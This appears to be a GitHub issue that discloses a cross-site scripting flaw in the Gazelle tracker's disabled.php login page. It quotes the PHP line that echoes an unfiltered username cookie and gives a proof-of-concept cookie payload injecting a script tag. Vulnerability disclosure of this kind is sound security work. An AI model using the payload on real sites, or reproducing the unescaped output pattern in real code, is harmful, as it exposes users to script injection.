Skip to content

xss_1 #129

@xjzzzxx

Description

@xjzzzxx

Hello,

I would like to report for a XSS vulnerability in gazelle commit 63b3370

In file https://github.com/WhatCD/Gazelle/blob/master/sections/login/disabled.php

...
<form action="" method="POST">
	<input type="email" class="inputtext" placeholder="Email Address" name="email" required /> <input type="submit" value="Submit" />
	<input type="hidden" name="username" value="<?=$_COOKIE['username']?>" />		// Line 25
</form><br /><br />
...

Source from $_COOKIE['username'] without any filtering or checking which resulting in XSS.

Poc

GET sections/login/disabled.php

With the Cookie

username=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22

Manual verification

1_0

1

BTW,cms.gazelle.com in local(changes hosts)

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions